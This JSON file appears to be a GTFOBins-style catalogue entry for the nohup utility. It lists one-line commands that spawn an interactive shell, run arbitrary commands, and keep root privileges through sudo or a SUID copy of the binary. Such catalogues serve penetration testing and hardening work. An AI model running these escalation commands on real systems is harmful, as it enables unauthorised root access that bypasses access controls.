You cannot select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.

25 lines
445 B
JSON

{
"functions": {
"shell": [
{
"code": "nohup /bin/sh -c \"sh <$(tty) >$(tty) 2>$(tty)\""
}
],
"command": [
{
"code": "nohup \"[command]\"\ncat nohup.out\n"
}
],
"sudo": [
{
"code": "sudo nohup /bin/sh -c \"sh <$(tty) >$(tty) 2>$(tty)\""
}
],
"suid": [
{
"code": "./nohup /bin/sh -p -c \"sh -p <$(tty) >$(tty) 2>$(tty)\""
}
]
}
}